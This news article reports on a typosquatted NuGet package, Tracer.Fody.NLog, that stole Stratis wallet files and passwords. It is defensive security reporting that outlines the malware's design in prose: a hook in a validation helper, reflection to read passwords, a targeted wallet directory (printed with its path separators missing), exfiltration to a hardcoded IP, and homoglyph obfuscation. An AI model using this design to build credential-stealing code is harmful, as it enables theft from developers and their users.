A sophisticated supply chain attack has been uncovered targeting .NET developers through a malicious NuGet package named Tracer.Fody.NLog. This package, which mimicked a legitimate tracing tool, was discovered by Socket.dev analysts to harbor code designed to steal cryptocurrency wallet data, specifically from Stratis wallets. The attack vector utilized typosquatting and social engineering, with the malicious package published under a nearly identical username to the legitimate maintainer, enabling it to evade detection for years.
First published in 2020, the Tracer.Fody.NLog package accumulated approximately 2,000 downloads while operating undetected. Its ability to blend in with the original package’s metadata and description allowed it to embed deeply within development pipelines and private tools. The compromise highlights a persistent threat to software development environments, where the integrity of open-source dependencies is paramount. The threat actor’s command-and-control server was reportedly located in Russia, indicating a coordinated effort to exfiltrate financial assets.
Inside the Wallet Stealing Code
The core of the malicious Tracer.Fody.NLog package’s operation lies in its clever injection into commonly used coding patterns. Security researchers identified that the malware hooks into a generic helper method named Guard.NotNull. This method is frequently employed by developers for argument validation, making it an inconspicuous location for malicious logic to reside. When this helper method processes an object containing a WalletPassword property, the embedded malware is triggered.
Leveraging reflection, the malicious code extracts the wallet password from such objects. Concurrently, it scans the victim’s system for Stratis wallet files. The primary target is the `%APPDATA%StratisNodestratisStratisMain` directory, where it specifically looks for `wallet.json` files. Once these files are located, the malware truncates the data to extract crucial keys. This sensitive information, along with the recovered password, is then silently exfiltrated to a hardcoded IP address, a server located in Russia.
To further complicate detection and manual code review, the attackers employed homoglyphs. These are Cyrillic characters that visually resemble Latin letters, making it extremely difficult for human analysts to identify suspicious code identifiers. This obfuscation technique, combined with the silent execution of the exfiltration routine, ensures that the compromised application appears to function normally while sensitive financial data is systematically drained from the system. The long dwell time of this malicious package, extending over five years, suggests a calculated and patient approach by the threat actors.
The implications of this attack are significant, demonstrating how easily trusted development tools can be weaponized. Routine updates to software dependencies can transform into critical security liabilities for organizations, potentially leading to substantial financial losses. The incident underscores the ongoing need for rigorous security practices in software supply chains, including enhanced dependency scanning and verification, to mitigate the risks posed by such sophisticated threats.
As the cybersecurity community continues to analyze the full scope of this campaign, developers are advised to scrutinize their project dependencies for any signs of compromise. The discovery of this particular malicious NuGet package serves as a stark reminder of the evolving tactics employed by cybercriminals targeting the software development ecosystem. Future efforts will likely focus on improving detection mechanisms and fostering greater awareness within the developer community regarding the inherent risks of relying on third-party code without adequate security vetting.